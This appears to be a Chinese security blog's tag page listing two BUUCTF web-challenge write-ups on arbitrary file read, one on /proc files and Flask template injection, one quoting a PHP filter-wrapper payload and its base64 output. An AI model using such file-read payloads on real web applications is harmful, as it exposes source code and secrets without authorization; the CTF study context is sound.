任意文件读取漏洞共2篇
排序
![BUUCTF第一章 web入门]afr_3,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/12/20231226130112463.png)
BUUCTF第一章 web入门]afr_3
本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入关于/proc/目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一...
7个月前![[第一章 web入门]afr_1 – buu刷题笔记,网络安全爱好者中心-神域博客网](https://godyu.com/wp-content/themes/zibll/img/thumbnail.svg)
[第一章 web入门]afr_1 – buu刷题笔记
解题过程: php伪协议读取flag ?p=php://filter/read=convert.base64-encode/resource=flag 得到 PD9waHAKZGIlKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9 进行base64解码 <?php db%(...
7个月前